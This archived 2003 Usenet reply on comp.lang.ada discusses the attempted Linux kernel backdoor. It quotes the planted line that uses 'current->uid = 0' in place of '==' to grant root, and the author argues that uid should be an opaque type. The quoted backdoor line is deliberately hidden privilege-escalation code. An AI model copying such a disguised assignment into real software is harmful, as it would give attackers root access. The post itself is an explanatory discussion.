From mboxrd@z Thu Jan  1 00:00:00 1970
X-Spam-Checker-Version: SpamAssassin 3.4.4 (2020-01-24) on polar.synack.me
X-Spam-Level: 
X-Spam-Status: No, score=-2.4 required=5.0 tests=BAYES_00,
	FREEMAIL_FORGED_FROMDOMAIN,FREEMAIL_FROM,HEADER_FROM_DIFFERENT_DOMAINS,
	MAILING_LIST_MULTI autolearn=unavailable autolearn_force=no
	version=3.4.4
X-Google-Language: ENGLISH,ASCII-7-bit
X-Google-Thread: 103376,71171f53c22d92b5
X-Google-Attributes: gid103376,public
X-Google-ArrivalTime: 2003-11-11 23:50:06 PST
Path: 
 archiver1.google.com!news2.google.com!news.maxwell.syr.edu!newsfeed.icl.net!newsfeed.fjserv.net!skynet.be!skynet.be!freenix!enst.fr!melchior!cuivre.fr.eu.org!melchior.frmug.org!not-for-mail
From: Duncan Sands <baldrick@free.fr>
Newsgroups: comp.lang.ada
Subject: Re: C's trikery semantic opens up backdoor in new Linux kernel
Date: Wed, 12 Nov 2003 08:50:16 +0100
Organization: Cuivre, Argent, Or
Message-ID: <mailman.328.1068623355.25614.comp.lang.ada@ada-france.org>
References: <3FB1A63C.9080200@nowhere.com>
	<pan.2003.11.12.05.13.39.401308@Smoke>
	<bosmuu$1hui4o$1@ID-175126.news.uni-berlin.de>
NNTP-Posting-Host: lovelace.ada-france.org
Mime-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Trace: melchior.cuivre.fr.eu.org 1068623355 56113 80.67.180.195 (12 Nov 2003
 07:49:15 GMT)
X-Complaints-To: usenet@melchior.cuivre.fr.eu.org
NNTP-Posting-Date: Wed, 12 Nov 2003 07:49:15 +0000 (UTC)
To: v.hoefler@acm.org, Vinzent 'Gadget' Hoefler <ada.rocks@jlfencey.com>,
	comp.lang.ada@ada-france.org
Return-Path: <duncan.sands@math.u-psud.fr>
User-Agent: KMail/1.5.1
In-Reply-To: <bosmuu$1hui4o$1@ID-175126.news.uni-berlin.de>
Content-Disposition: inline
X-Virus-Scanned: by amavisd-new-20030616-p5 (Debian) at ada-france.org
X-BeenThere: comp.lang.ada@ada-france.org
X-Mailman-Version: 2.1.2
Precedence: list
List-Id: Gateway to the comp.lang.ada Usenet newsgroup
	<comp.lang.ada.ada-france.org>
List-Unsubscribe: <http://www.ada-france.org/mailman/listinfo/comp.lang.ada>,
	<mailto:comp.lang.ada-request@ada-france.org?subject=unsubscribe>
List-Post: <mailto:comp.lang.ada@ada-france.org>
List-Help: <mailto:comp.lang.ada-request@ada-france.org?subject=help>
List-Subscribe: <http://www.ada-france.org/mailman/listinfo/comp.lang.ada>,
	<mailto:comp.lang.ada-request@ada-france.org?subject=subscribe>
Xref: archiver1.google.com comp.lang.ada:2399
Date: 2003-11-12T08:50:16+01:00

> The interesting line in question is this one:
> |if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
>
> First this looks like a sanity check. But look closer. This single
> line serves one single purpose: to give you root-privileges when you
> just pass the right flags. Note the "current->uid = 0" instead of
> "current->uid == 0". Who the hell had the fucking bad idea that
> assignments could return values?

IMHO the real problem is that uid is not an opaque type and can
be changed with a simple assignment.  Much better if that required
a function call.

All the best,

Duncan.